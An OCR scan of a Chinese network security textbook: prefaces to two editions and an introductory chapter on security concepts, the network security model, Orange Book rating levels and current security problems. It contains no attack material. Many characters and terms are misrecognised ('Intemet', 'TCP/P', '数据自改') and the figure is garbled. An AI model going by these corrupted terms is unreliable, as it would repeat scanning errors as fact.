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第 2 版 前 言 


计算 机 网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 保护 ， 不 致 因 偶然 
的 或 者 恶意 的 原因 而 遭 到 破坏 、 更 改 、 泄 露 ， 系 统 能 连续 可 靠 地 运行 ， 使 网 络 服务 不 中 
断 。 网 络 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 、 通 信 技 术 、 密 码 技 术 、 信 息 安全 技术 、 
应 用 数学 、 数 论 、 信 息 论 等 多 种 学 科 的 综合 性 学 科 。 随 着 计算 机 网 络 技术 的 发 展 ， 网 络 的 
安全 问题 越 来 越 受 到 关注 ， 网 络 安全 已 超越 其 本 身 而 上 升 到 国家 安全 的 高 度 。 

本 书 在 介绍 网 络 安全 理论 及 其 基础 知识 的 同时 ， 突 出 计算 机 网 络 安全 方面 的 管理 、 配 
置 及 维护 的 实际 操作 手法 和 手段 ， 并 尽量 跟踪 网 络 安全 技术 的 最 新 成 果 与 发 展 方向 ， 结 合 
网 络 安全 系统 案例 精心 阐述 。 第 2 版 突出 了 实用 性 和 应 用 性 以 及 应 用 举例 ， 删 除 相对 过 时 
的 技术 介绍 。 全 书 主要 内 容 包括 计算 机 网 络 安全 概述 、 密 码 学 基础 、 操 作 系统 安全 技术 、 
网 络 安全 协议 、 网 络 漏洞 扫描 技术 、 防 火 墙 技术 、 入 侵 检测 技术 、 计 算 机 病毒 防治 技术 、 
数据 库 与 数据 安全 技术 等 内 容 。 全 书 共 分 9 章 ， 内 容 安排 如 下 。 

第 1 章 具 体 介 绍 计算 机 网 络 安全 的 相关 基础 知识 ， 包 括 网 络 安全 的 概念 及 影响 网 络 安 
全 的 主要 因素 、 网 络 安全 的 组 成 以 及 网 络 安全 常用 技术 ; 第 2 章 介 绍 网 络 安全 中 密码 学 基 
础 ， 包 括 密 码 体制 的 概念 、 对 称 密码 体制 、DES 加 密 标准 、 公 钥 密 码 体制 和 数字 签名 、 认 
证 等 技术 ; 第 3 章 主 要 介绍 操作 系统 安全 技术 ， 包 括 Windows 和 Linux 操作 系统 的 安全 机 
制 、 安 全 漏洞 和 安全 配置 方案 ; 第 4 章 介绍 网 络 安全 协议 ， 包 括 网 络 各 层 的 相关 协议 、 
IPSec 协议 、SSL 安全 协议 、TSL 协议 、 安 全 电子 交易 SET、PGP 协议 、 虚 拟 专 用 网 技术 
等 ; 第 5 章 介绍 网 络 漏洞 扫描 技术 ， 包 含 黑客 攻击 、 网 络 漏洞 扫描 技术 以 及 常用 扫描 工 
具 ; 第 6 章 介 绍 访问 控制 技术 中 的 防火 墙 技术 ， 包 括 防火 墙 的 原理 、 种 类 和 实现 策略 等 
第 7 章 主要 介绍 对 入 侵 检测 的 概念 和 相关 技术 进行 了 全 面 介绍 ， 并 对 入 侵 检 测 的 未 来 发 展 
进行 了 讨论 , 第 8 章 主要 介绍 病毒 的 原理 、 病 毒 的 类 型 和 计算 机 网 络 病毒 ， 同 时 介绍 了 几 
种 影响 较 大 的 网 络 病毒 以 及 病毒 的 清除 及 防护 措施 ， 第 9 章 主 要 介绍 数据 库 与 数据 安全 技 
术 ， 数 据 库 的 安全 特性 、 数 据 库 的 安全 、 保 护 数 据 的 完整 性 、 数 据 备份 和 恢复 、 网 络 备份 
和 系统 数据 容 灾 等 内 容 。 

由 于 网 络 安全 的 内 容 非 常 丰富 ， 本 书 按理 论 教学 以 “必需 、 够 用 ”为 度 、 加 强 实践 性 
环节 教学 、 提 高 学 生 的 实际 技能 的 原则 组 织 编写 。 讲 究 知识 性 、 系 统 性 、 条 理性 、 连 贯 
性 。 力 求 激发 学 生 的 学 习 兴 趣 ， 注 重 提示 各 知识 点 之 间 的 内 在 联系 ， 精 心 组 织 内容 ， 做 到 
由 浅 入 深 、 由 易 到 难 、 删 繁 就 简 、 突 出 重点 、 循 序 渐 进 。 本 书 既 注重 网 络 安全 基础 理论 
又 着 眼 培养 读者 解决 网 络 安全 问题 的 能 力 。 

本 书 的 特点 是 文字 简明 、 图 表 准 确 、 通 俗 易 懂 ， 用 循序 渐进 的 方式 叙述 网 络 安全 知 
识 ， 对 计算 机 网 络 安全 的 原理 和 技术 难点 的 介绍 适度 ， 内 容 安 排 合 理 ， 风 辑 性 强 ， 重 点 介 
绍 网 络 安全 的 概念 、 技 术 和 应 用 ， 在 内 容 上 将 理论 知识 和 实际 应 用 紧密 地 结合 在 一 起 。 本 
书 适用 于 48 学 时 左右 的 课堂 教学 。 通 过 对 本 书 的 学 习 ， 可 使 学 生 较 全 面 地 了 解 网 络 系统 
安全 的 基本 概念 、 网 络 安全 技术 和 应 用 ， 培 养 学 生 解 决 网 络 安全 问题 的 能 力 。 
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本 书 由 刘 永 华 、 张 秀 洁 、 孙 艳 娟 担任 主编 并 完成 全 书 的 撰写 与 统 稿 整理 。 其 中 第 1 一 6 
章 由 刘 永 华 编写 ， 第 7~9 章 由 张 秀 洁 编 写 。 陈 苗 、 解 圣 庆 、 董 春平 、 洪 璐 、 赵 艳 杰 、 孙 
俊 香 、 付 新 转 、 韩 美丽 对 本 书 的 编写 提供 了 帮助 ， 在 此 作者 向 他 们 表示 感谢 。 

由 于 作者 水 平 有 限 ， 书 中 难免 有 玻 漏 和 不 足 之 处 ， 奶 请 广大 读者 和 同行 批评 指正 。 


编 者 


第 1 版 前 言 


计算 机 网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 保护 ， 不 因 偶然 的 
或 者 恶意 的 原因 而 遭受 到 破坏 、 更 改 、 泄 露 ， 系 统 连续 可 靠 地 运行 ， 网 络 服务 不 中 断 。 网 
络 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 、 通 信 技 术 、 密 码 技术 、 信 息 安 全 技术 、 应 用 数 
学 、 数 论 、 信 息 论 等 多 种 学 科 的 综合 性 学 科 。 随 着 计算 机 网 络 技术 的 发 展 ， 网 络 的 安全 问 
题 越 来 越 受 到 关注 ， 网 络 安全 已 超越 其 本 身 而 达到 国家 安全 的 高 度 。 

本 书 在 介绍 网 络 安全 理论 及 其 基础 知识 的 同时 ， 突 出 计算 机 网 络 安全 方面 的 管理 、 配 
置 及 维护 的 实际 操作 手法 和 手段 ， 并 尽量 跟踪 网 络 安全 技术 的 最 新 成 果 与 发 展 方向 ， 结 合 
网 络 安全 系统 案例 精心 阐述 。 全 书 主要 内 容 包 括 网 络 安全 的 基本 概念 、 数 据 加 密 与 认证 技 
术 、 操 作 系 统 的 安全 与 保护 措施 、 数 据 库 与 数据 安全 、 防 火 墙 技术 、 黑 客 技术 与 防范 措 
施 、 网 络 病毒 技术 、VPN 技术 与 安全 协议 、 网 络 管理 与 维护 技术 、Internet/Intranet 的 安全 
性 、 网 络 信息 安全 系统 案例 等 。 全 书 共 分 10 章 ， 内 容 安排 如 下 。 

第 1 章 具 体 介 绍 计算 机 网 络 安全 的 相关 基础 知识 ， 包 括 网 络 安全 的 概念 及 影响 网 络 安 
全 的 主要 因素 ， 网 络 安全 的 组 成 以 及 网 络 安全 常用 的 技术 ; 第 2 章 介绍 网 络 安全 中 数据 加 
密 与 认证 技术 ， 包 括 传统 的 加 密 方法 、DES 加 密 标 准 、 公 开 密 钥 体 制 和 数字 签名 等 技术 ; 
第 3 章 主要 介绍 操作 系统 安全 技术 ， 介 绍 了 Windows 和 Linux 操作 系统 的 安全 机 制 、 安 全 
漏洞 和 安全 配置 方案 ; 第 4 章 介绍 数据 库 与 数据 安全 技术 , 数据 库 的 安全 特性 、 数 据 库 的 
安全 、 保 护 数据 的 完整 性 、 数 据 备 份 和 恢复 、 网 络 备份 、 系 统 数据 容 灾 等 ; 第 5 章 主 要 介 
绍 病 毒 的 原理 、 病 毒 的 类 型 和 计算 机 网 络 病毒 ， 同 时 介绍 了 几 种 影响 较 大 的 网 络 病毒 ， 并 
且 介绍 了 病毒 的 清除 及 防护 措施 ;第 6 章 介 绍 访问 控制 技术 中 的 防火 墙 的 技术 ， 包 括 防火 
墙 的 原理 、 种 类 和 实现 策略 等 第 7 章 主要 介绍 对 入 侵 检测 的 概念 和 相关 技术 进行 介绍 ， 
并 对 入 侵 检 测 的 未 来 发 展 进行 了 讨论 ， 第 8 章 主要 介绍 VPN 与 NAT 技术 及 安全 协议 ， 涉 
及 VPN 的 原理 与 设置 、NAT 的 工作 工程 ， 以 及 网 络 安全 的 几 个 主要 协议 ; 第 9 章 主要 介 
绍 计算 机 网 络 管理 和 维护 技术 ， 主 要 包括 网 络 管理 的 基本 概念 、 网 络 管理 协议 、 网 络 管理 
工具 和 网 络 维护 方法 ， 介 绍 了 Windows 自 带 的 常用 网 络 工具 ， 讨 论 了 网 卡 、 集 线 器 、 交 换 
机 、 路 由 器 、 网 线 和 RJ-45 接头 等 网 络 连接 设备 的 维护 ， 网 络 的 性 能 优化 等 问题 ， 重 点 介 
绍 了 常用 网 络 故障 及 排除 方法 ， 第 10 章 主要 介绍 了 网 络 信息 安全 系统 设计 案例 ， 涉 及 需 
求 分 析 、 工 程 论 证 、 总 体 设 计 与 实体 设计 等 内 容 。 

由 于 网 络 安全 的 内 容 非 常 丰 富 ， 本 书 按理 论 教学 以 “必需 、 够 用 ”为 度 ， 加 强 实践 性 
环节 教学 ， 提 高 学 生 的 实际 技能 的 原则 组 织 编写 。 讲 究 知识 性 、 系 统 性 、 条 理性 、 连 贯 
性 。 力 求 激发 学 生 兴 趣 ， 注 重 提示 各 知识 之 间 的 内 在 联系 ， 精 心 组 织 内 容 ， 做 到 由 浅 入 
深 ， 由 易 到 难 ， 删 繁 就 简 ， 突 出 重点 ， 循 序 渐进 。 本 书 既 注 重 网 络 安全 基础 理论 ， 又 着 眼 
培养 读者 解决 网 络 安全 问题 的 能 力 。 

本 书 的 特点 是 文字 简明 、 图 表 准 确 、 通 俗 易 懂 ， 用 循序 渐进 的 方式 叙述 网 络 安全 知 
识 ， 对 计算 机 网 络 安全 的 原理 和 技术 难点 的 介绍 适度 ， 内 容 安 排 合 理 ， 逻 辑 性 强 ， 重 点 介 
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绍 网 络 安全 的 概念 、 技 术 和 应 用 ， 在 内 容 上 将 理论 知识 和 实际 应 用 紧密 地 结合 在 一 起 。 本 
书 共 10 章 ， 适 用 于 48 学 时 左右 的 课堂 教学 。 通 过 对 本 书 的 学 习 ， 可 使 读者 较 全 面 地 了 解 
网 络 系统 安全 的 基本 概念 、 网 络 安全 技术 和 应 用 ， 培 养 读 者 解决 网 络 安全 问题 的 能 
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中 oo 必 》 计算 机 网 络 信息 安全 (第 2 版 ) 


学 习 目标 

系统 学 习 网 络 安全 的 概念 ， 网 络 面临 的 主要 威胁 ， 影 响 网 络 安全 的 因素 ， 保 证 网 络 安 
全 的 技术 。 通 过 对 本 章 内容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 

@ 掌握 网 络 安 全 的 概念 、 网 络 安全 的 基本 技术 。 

@ 了解 网 络 的 安全 威胁 以 及 影响 网 络 安全 的 主要 因素 。 


1.1 计算 机 网 络 安全 简介 


随 着 全 球 信息 基础 设施 和 各 个 国家 信息 基础 设施 的 形成 ， 计 算 机 网 络 已 经 成 为 信息 化 
社会 发 展 的 重要 保障 ， 网 络 深入 到 国家 的 政府 、 军 事 、 文 教 、 企 业 等 诸多 领域 ， 许 多 重要 
的 政府 宏观 调控 决策 、 商 业经 济 信息 、 银 行 资 金 转账 、 股 票证 券 、 能 源 资源 数据 、 科 研 数 
据 等 重要 信息 都 通过 网 络 存储 、 传 输 和 处 理 。 所 以 ， 难 免 会 招致 各 种 主动 或 被 动 的 人 为 攻 
击 ， 如 信息 泄露 、 信 息 窃取 、 数 据 自 改 和 计算 机 病毒 等 。 同 时 ， 通 信 实 体 还 面临 着 诸如 水 
灾 、 火 灾 、 地 震 和 电磁 辐射 等 方面 的 考验 。 因 此 ， 网 络 安全 越 来 越 引起 人 们 的 重视 。 


1.1.1 网 络 安全 的 概念 


人 们 在 享受 信息 化 带 来 众多 好 处 的 同时 ， 也 面临 着 日 益 突出 的 信息 安全 与 保密 问题 。 
计算 机 网 络 信息 安全 技术 经 过 10 多 年 的 快递 发 展 ， 在 信息 安全 技术 的 研究 上 形成 了 两 个 
完全 不 同 的 角度 和 方向 :一 个 从 正面 防御 考虑 ， 研 究 加 密 、 鉴 别 、 认 证 、 授 权 和 访问 控制 
等 ， 另 一 个 从 反面 攻击 考虑 ， 研 究 漏洞 扫描 评估 、 入 侵 检测 、 紧 急 响 应 和 防 病毒 。 网 络 安 
全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 。 它 涉及 的 领域 相当 广泛 ， 这 是 因为 在 目前 的 公 
用 通信 网 络 中 存在 着 各 种 各 样 的 安全 漏洞 和 威胁 。 下 面 给 出 网 络 安全 的 一 个 通用 定义 。 

网 络 安全 就 是 网 络 上 的 信息 安全 ， 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 
保护 ， 不 受 偶然 的 或 者 恶意 的 原因 而 遭 到 破坏 、 更 改 、 泄 露 ， 系 统 能 连续 、 可 靠 、 正 常 地 
运行 ， 网 络 服务 不 中 断 。 

广义 来 说 ， 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 
技术 和 理论 都 是 网 络 安全 所 要 研究 的 领域 。 

络 安全 涉及 的 内 容 既 有 技术 方面 的 问题 ， 也 有 管理 方面 的 问题 ， 两 者 相互 补充 ， 缺 
一 不 可 。 技 术 方 面 主要 侧重 于 防范 外 部 非法 用 户 的 攻击 ， 管 理 方面 则 侧重 于 内 部 人 为 因素 
的 管理 


络 安全 要 考虑 以 下 几 个 方面 的 内 容 。 
- 网 络 系统 的 安全 


络 系统 的 安全 主要 包括 以 下 几 方 面 的 问题 。 

(1) 网 络 操作 系统 的 安全 性 。 目 前 流行 的 服务 器 操作 系统 (UNIX、Windows Server 
2016/2012/2008/2003、Windows 2000/NT Server 等 ) 以 及 客户 端 操作 系统 (Linux、Windows 
10/7/Vista/XP/2000 等 ) 均 存在 网 络 安全 漏洞 。 

(2) 来 自 外 部 的 安全 威胁 。 


a 
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(3) 来 自 内 部 用 户 的 安全 威胁 。 

(4) 通信 协议 软件 本 身 缺 乏 安全 性 (如 TCP/P 协议 )。 

(5) 计算 机 病毒 感染 。 

(6) 应 用 服务 的 安全 。 许 多 应 用 服务 系统 在 访问 控制 及 安全 通信 方面 考虑 得 不 周全 。 


2. 局 域 网 安全 


局 域 网 采用 广播 方式 ， 在 同一 个 广播 域 中 可 以 侦 听 到 在 该 局 域 网 上 传输 的 所 有 信息 
包 ， 这 是 一 个 不 安全 因素 。 


3. Internet( 互 联网 ) 安 全 


非 授权 访问 、 冒 充 合法 用 户 、 破 坏 数据 完整 性 、 干 扰 系统 正常 运行 、 利 用 网 络 传播 病 
毒 等 都 是 在 Intemet 上 经 常 遇 到 的 问题 。 


4. 数据 安全 


事实 上 ， 无论 是 Intermet 还 是 其 他 专用 网 络 ， 都 必须 注意 数据 的 安全 性 问题 ， 以 保护 
本 单位 、 本 部 门 的 信息 资源 不 会 受到 外 来 的 侵害 。 

从 根本 意义 上 讲 ， 绝 对 安全 的 计算 机 是 不 存在 的 ， 绝 对 安全 的 网 络 也 是 不 可 能 有 的 。 
只 有 存放 在 一 个 无 人 知晓 的 密室 里 ， 而 又 不 插 电 的 计算 机 才 可 以 称 之 为 安全 。 计 算 机 只 要 
投入 使 用 ， 就 或 多 或 少 地 存在 着 安全 问题 ， 只 是 程度 不 同 而 已 。 因 此 ， 在 探讨 网 络 安全 的 
时 候 ， 实 际 上 指 的 是 一 定 程度 的 网 络 安全 。 而 到 底 需 要 多 大 的 安全 性 ， 要 依据 实际 需要 及 
自身 能 力 而 定 。 网 络 安全 性 越 高 ， 同 时 也 意味 着 网 络 的 管理 越 复杂 。 网 络 的 安全 性 与 网 络 
管理 的 便利 性 是 一 对 矛盾 。 


1.1.2 网络 安 全 模型 


典型 的 网 络 安全 模型 如 图 1.1 所 示 。 信 息 需 要 从 一 方 通过 网 络 传送 到 另 一 方 。 在 传送 
中 居 主 体 地 位 的 双方 必须 合作 以 便 进行 信息 交换 。 通 过 通信 协议 (如 TCP/IP) 在 两 个 主体 之 
间 可 以 建立 一 条 逻辑 信息 通道 。 

为 防止 对 手 ( 指 可 能 有 恶意 的 其 他 个 人 或 组 织 ) 对 信息 机 密 性 、 可 靠 性 等 造成 破坏 ， 需 
要 保护 传送 的 信息 。 保 证 安全 性 的 所 有 机 制 包括 以 下 两 部 分 。 

(1) 对 被 传送 的 信息 进行 与 安全 相关 的 转换 。 图 1.1 中 包含 了 消息 的 加 密 和 以 消息 内 容 
为 基础 的 补充 代码 。 加 密 消息 使 对 手 无 法 阅读 ， 补 充 代码 可 以 用 来 验证 发 送 方 的 身份 。 

(2) 两 个 主体 共享 不 希望 对 手 得 知 的 保密 信息 。 例 如 ， 使 用 密 钥 链 接 ， 在 发 送 前 对 信 
息 进 行 转换 ， 在 接收 后 再 转换 回来 。 

为 了 实现 安全 传送 ， 可 能 需要 可 信任 的 第 三 方 。 例如， 第 三 方 可 能 会 负责 向 两 个 主体 
分 发 保密 信息 ， 而 向 其 他 对 手 保密 ， 或 者 需要 第 三 方 对 两 个 主体 间 传 送信 息 可 靠 性 的 争端 
进行 仲裁 。 
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可 信任 的 第 三 方 


(如 保密 信息 的 仲裁 者 、 发 布 者 ) 
消息 一 ”| 一 > 消息 
几 | 一 如 
与 安全 性 相关 的 转换 计 字 与 安全 性 相关 的 转换 


1.1 网 络 安全 模型 


这 种 通用 模型 指出 了 设计 特定 安全 服务 的 4 个 基本 任务 。 

(1) 设计 执行 与 安全 性 相关 的 转换 算法 ， 该 算法 必须 使 对 手 不 能 对 算法 进行 破解 以 实 
现 其 目的 。 

(2) 生成 算法 使 用 的 保密 信息 。 

(3) 开发 分 发 和 共享 保密 信息 的 方法 。 

(4) 指定 两 个 主体 要 使 用 的 通信 协议 ， 并 利用 安全 算法 和 保密 信息 来 实现 特定 的 安全 
服务 。 


1.1.3 ”计算 机 安全 的 分 级 


计算 机 操作 系统 的 安全 级 别 在 美国 国防 部 发 表 的 橘 皮 书 一 《可 信 计 算 机 系统 评测 标 
准 》 中 ， 把 计算 机 系统 分 为 4 个 等 级 、7 个 级 别 ， 即 D( 最 低 保 护 等 级 )、C( 自 主 保护 等 
级 )、B( 强 制 保护 等 级 )、A( 验 证 保护 等 级 ) 四 等 ， 细 分 为 Dl、Cl、C2、B1、B2、B3、Al 
七 级 。 

(1) D1 级 : 这 是 计算 机 安全 的 最 低 一 级 ， 不 要 求 用 户 进行 登录 和 密码 保护 ， 任 何人 都 
可 以 使 用 ， 整 个 系统 是 不 可 信任 的 ， 硬 件 和 软件 都 易 被 侵袭 。 

(2) Cl 级 : 又 称 自主 安全 保护 级 ， 要 求 硬件 有 一 定 的 安全 级 (如 计算 机 带 锁 )， 用 户 必 
须 通过 登录 认证 方 可 使 用 系统 ， 并 建立 了 访问 许可 权限 机 制 。 

(3) C2 级 : 又 称 受 控 存 取保 护 级 。 比 C1 级 增加 了 几 个 特性 ， 包 括 : 引进 了 受 控 访问 
环境 ， 进 一 步 限 制 了 用 户 执行 某 些 系 统 指令 ; 授权 分 级 使 系统 管理 员 给 用 户 分 组 ， 授 予 他 
们 访问 某 些 程序 和 分 级 目录 的 权限 : 采用 系统 审计 ， 跟 踪 记 录 所 有 安全 事件 及 系统 管理 员 
的 工作 。 

(4) Bl 级 : 又 称 标记 安全 保护 级 。 对 网 络 上 每 个 对 象 都 实施 保护 ;支持 多 级 安全 ， 对 
网 络 、 应 用 程序 工作 站 实施 不 同 的 安全 策略 ; 对 象 必 须 在 访问 控制 之 下 ， 不 允许 拥有 者 自 
己 改变 所 属 资源 的 权限 。 

(5) B2 级 : 又 称 结构 化 保护 级 。 对 网 络 和 计算 机 系统 中 所 有 对 象 都 加 以 定义 ， 并 贴 一 
个 标签 ， 为 工作 站 、 终 端 等 设备 分 配 不 同 的 安全 级 别 ; 按 最 小 特权 原则 取消 权力 无 限 大 的 
特权 用 户 。 
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(6) B3 级 : 又 称 安全 域 级 。 要 求 用 户 工作 站 或 终端 必须 通过 可 信任 的 途径 链接 到 网 络 
系统 内 部 的 主机 上 ; 采用 硬件 来 保护 系统 的 数据 存储 区 ; 根据 最 小 特权 原则 ， 增 加 了 系统 
安全 员 ， 将 系统 管理 员 、 系 统 操作 员 和 系统 安全 员 的 职责 分 离 ， 使 人 为 因素 对 计算 机 安全 
的 威胁 降 至 最 小 。 

(7) Al 级 : 又 称 验证 设计 级 。 这 是 计算 机 安全 级 中 最 高 的 一 级 ， 包 括 以 上 各 级 别 的 所 
有 措施 ， 并 附加 了 一 个 安全 系统 的 受 监视 设计 ; 合格 的 个 体 必须 经 过 分 析 并 通过 这 一 设 
计 ， 所 有 构成 系统 的 部 件 来 源 都 必须 有 安全 保证 ;这 一 级 还 规定 了 将 安全 计算 机 系统 运送 
到 现场 安装 所 必须 遵守 的 程序 。 

在 网 络 的 具体 设计 过 程 中 ， 应 根据 网 络 总 体 规划 中 提出 的 各 项 技术 规范 、 设 备 类 型 、 
性 能 要 求 及 经 费 预 算 等 综合 考虑 来 确定 一 个 比较 合理 、 性 能 较 高 的 网 络 安全 级 别 ， 从 而 实 
现 网 络 的 安全 性 和 可 靠 性 。 


1.1.4 网 络 安全 的 重要 性 


在 信息 社会 中 ， 信 息 具 有 与 能 源 、 物 源 同等 的 价值 ， 在 某 些 时 候 甚至 具有 更 高 的 价 
值 。 具 有 价值 的 信息 必然 存在 安全 性 问题 ， 对 于 企业 更 是 如 此 。 例 如 ， 在 竞争 激烈 的 市 场 
经 济 驱动 下 ， 每 个 企业 对 于 原料 配额 、 生 产 技术 、 经 营 决 策 等 信息 ， 在 特定 的 地 点 和 业务 
范围 内 都 具有 保密 的 要 求 ， 一 旦 这 些 机 密 被 泄露 ， 不 仅 会 给 企业 甚至 也 会 给 国家 造成 严重 
的 经 济 损失 。 

经 济 社会 的 发 展 要 求 各 用 户 之 间 的 通信 和 资源 共享 ， 需 要 将 一 批 计算 机 联 成 网 络 ， 这 
样 就 隐 含 着 很 大 的 风险 ， 包 含 了 极 大 的 脆弱 性 和 复杂 性 ， 特 别 是 对 当今 最 大 的 网 络 一 一 国 
际 互联 网 (Internet)， 很 容易 遭 到 别有用心 者 的 恶意 攻击 和 破坏 。 随 着 国民 经 济 信息 化 程度 
的 提高 ， 有 关 大 量 情报 和 商务 信息 都 高 度 集中 地 存放 在 计算 机 中 ， 随 着 网 络 应 用 范围 的 扩 
大 ， 信 息 泄露 问题 也 变 得 日 益 严 重 ， 因 此 ， 计 算 机 网 络 的 安全 性 问题 就 越 来 越 重 要 。 


1.2 计算 机 网 络 安全 现状 


互联 网 与 生 俱 有 的 开放 性 、 交 互 性 和 分 散 性 特征 使 人 类 所 异 慢 的 信息 共享 、 开 放 、 灵 
活 和 快速 等 需求 得 到 满足 。 网 络 环境 为 信息 共享 、 信 息 交流 、 信 息 服务 创造 了 理想 空间 ， 
网 络 技术 的 迅速 发 展 和 广泛 应 用 ， 为 人 类 社会 的 进步 提供 了 巨大 推动 力 。 正 是 由 于 互联 网 
的 上 述 特 性 ， 产 生 了 许多 安全 问题 。 

中 黑客 (HackeD。 这 是 指 在 Internet 上 有 一 批 熟悉 网 络 技术 的 人 ， 经 常 利用 网 络 上 现 
存 的 一 些 漏洞 ， 设 法 进入 他 人 的 计算 机 系统 。 有 些 人 只 是 为 了 好 奇 ， 而 有 些 人 是 存在 不 良 
动机 侵入 他 人 系统 ， 他 们 偷 罕 机 密 信 息 ， 或 将 其 计算 机 系统 破坏 ， 这 部 分 人 就 称 为 “ 黑 
客 ”。 尽 管 人 们 在 计算 机 技术 上 做 出 了 种 种 努力 ， 但 这 种 攻击 却 盒 演 愈 烈 。 从 单一 地 利用 
计算 机 病毒 破坏 和 用 黑客 手段 进行 入 侵 攻 击 转变 为 使 用 恶意 代码 与 黑客 攻击 手段 结合 ， 使 
得 这 种 攻击 具有 传播 速度 惊人 、 受 害 面 巨大 和 穿 透 深度 广 的 特点 ， 往 往 一 次 攻击 就 会 给 受 
害 者 带 来 严重 的 破坏 和 损失 。 

@ 信息 泄露 、 信 息 污染 、 信 息 不 易 受 控 。 例 如 ， 资 源 未 授权 侵 用 、 未 授权 信息 流出 


sy. 
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现 、 系 统 拒绝 信息 流 和 系统 否认 等 ， 这 些 都 是 信息 安全 的 技术 难点 。 

@ 在 网 络 环境 中 ， 一 些 组 织 或 个 人 出 于 某 种 特殊 目的 ， 进 行 信息 泄密 、 信 息 破 坏 、 
信息 侵权 和 意识 形态 的 信息 渗透 ， 甚 至 通过 网 络 进行 政治 颠覆 等 活动 ， 使 国家 利益 、 社 会 
公共 利益 和 各 类 主体 的 合法 权益 受到 威胁 。 

@ 网 络 运用 的 趋势 是 全 社会 广泛 参与 ， 随 之 而 来 的 是 控制 权 分 散 的 管理 问题 。 由 了 
人 们 利益 、 目 标 、 价 值 观 的 分 歧 ， 使 信息 资源 的 保护 和 管理 出 现 脱节 和 真空 ， 从 而 使 信息 
安全 问题 变 得 广泛 而 复杂 。 

回 随 着 社会 重要 基础 设施 的 高 度 信息 化 ， 社 会 的 “命脉 ”和 核心 控制 系统 有 可 能 
恶意 攻击 而 导致 损坏 和 瘫痪 ,包括 国防 通信 设施 、 动 力 控制 网 、 金 融 系 统 和 政府 网 站 等 。 

近年 来 ， 人 们 的 网 络 安全 意识 逐步 提高 ， 很 多 企业 根据 核心 数据 库 和 系统 运营 的 需 
要 ， 逐 步 部 署 了 防火 墙 、 防 病毒 和 入 侵 监 测 系统 等 安全 产品 ， 并 配备 了 相应 的 安全 策略 。 
虽然 有 了 这 些 措施 ， 但 并 不 能 解决 一 切 问 题 。 我 国 网 络 安全 问题 日 益 突出 ， 其 主要 表现 为 
以 下 几 个 方面 。 


1. 安全 事件 不 能 及 时 、 准 确 发 现 


网 络 设备 、 安 全 设备 、 系 统 每 天 生成 的 日 志 可 能 有 上 万 甚至 几 十 万 条 ， 这 样 人 工地 对 
多 个 安全 系统 的 大 量 日 志 进行 实时 审计 、 分 析 流 于 形式 ， 再 加 上 误 报 (如 网 络 入 侵 检 测 系 统 
(NIDS)、 互 联网 协议 群 (Ps))、 漏 报 (如 未 知 病毒 、 未 知 网 络 攻击 、 未 知 系统 攻击 ) 等 问题 ， 
造成 不 能 及 时 、 准 确 地 发 现 安全 事件 。 


2. 安全 事件 不 能 准确 定位 


言 息 安 全 系统 通常 是 由 防火 墙 、 入 侵 检测 、 漏 洞 扫 描 、 安 全 审计 、 防 病毒 、 流 量 监控 
等 产品 组 成 的 ， 但 是 由 于 安全 产品 来 自 不 同 的 厂商 ， 没 有 统一 的 标准 ， 所 以 安全 产品 之 间 
无 法 进行 信息 交流 ， 于 是 形成 许多 安全 孤岛 和 安全 盲区 。 由 于 事件 孤立 ， 相 互 之 间 无 法 形 
成 很 好 的 集成 关联 ， 因 而 一 个 事件 的 出 现 不 能 关联 到 真实 问题 。 

如 入 侵 监 测 系统 事件 报警 ， 就 须 关联 同一 时 间 防 火 墙报 警 、 被 攻击 的 服务 器 安全 日 志 
报警 等 ， 从 而 了 解 是 真实 报警 还 是 误 报 ; 如 是 未 知 病毒 的 攻击 ， 则 分 为 两 类 ， 即 网 络 病 
毒 、 主 机 病毒 。 网 络 病毒 大 都 表现 为 流量 异常 ， 主 机 病毒 大 都 表现 为 中 央 处 理 器 异常 、 内 
存 异 常 、 磁 盘 空 间 异 常 、 文 件 的 属性 和 大 小 改变 等 。 要 发 现 这 个 问题 ， 需 要 关联 流量 监控 
(针对 网 络 病毒 )、 关 联 服务 器 运行 状态 监控 (针对 主机 病毒 )、 关 联 完整 性 检测 (针对 主机 
毒 )。 为 了 预防 网 络 病毒 大 规模 爆发 ， 则 必须 在 病毒 爆发 前 快速 发 现 中 毒 机 器 并 切断 源头 。 
例如 ， 服 务 器 的 攻击 ， 可 能 是 安全 事件 遭 病毒 感染 ， 分 布 式 拒绝 服务 DDoS(Distributed 
Denial of Service) 攻 击 ， 可 能 是 服务 器 CPU 超 负 荷 : 端口 某 服务 流量 太 大 、 访 问 量 太 大 
等 ， 必 须 将 多 种 因素 结合 起 来 才能 更 好 地 分 析 ， 快 速 知 道真 实 问题 点 并 及 时 恢复 正常 。 

DDoS 是 一 种 基于 DoS 的 特殊 形式 的 拒绝 服务 攻击 ， 是 一 种 分 布 、 协 作 的 大 规模 攻击 
方式 ， 主 要 瞄准 比较 大 的 站 点 ， 像 商业 公司 、 搜 索引 擎 和 政府 部 门 的 站 点 。 DDoS 攻击 是 
利用 一 批 受 控制 的 机 器 向 一 台 机 器 发 起 攻击 ， 这 样 来 势 凶 猛 的 攻击 令 人 难以 防备 ， 因 此 具 
有 较 大 的 破坏 性 。 
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3. 无 法 做 集中 的 事件 自动 统计 

如 某 台 服务 器 的 安全 情况 报表 、 所 有 机 房 发 生 攻击 事件 的 频率 报表 、 网 络 中 利用 次 数 
最 多 的 攻击 方式 报表 、 发 生 攻击 事件 的 网 段 报表 、 服 务 器 性 能 利用 率 最 低 的 服务 器 列表 
等 ， 需 要 管理 员 人 为 地 对 这 些 事件 做 统计 记录 ， 生 成 报告 ， 从 而 耗费 大 量 人 力 。 

4. 缺乏 有 效 的 事件 处 理 查询 

没有 对 事件 处 理 的 整个 过 程 做 跟踪 记录 ， 信 息 部 门 主管 不 了 解 哪些 管理 员 对 该 事件 进 
行 了 处 理 ， 处 理 过 程 和 结果 也 没有 做 记录 ， 使 得 处 理 的 知识 经 验 不 能 得 到 共享 ， 导 致 下 次 
再 发 生 类 似 事件 时 处 理 效率 低下 。 

5. 缺乏 专业 的 安全 技能 

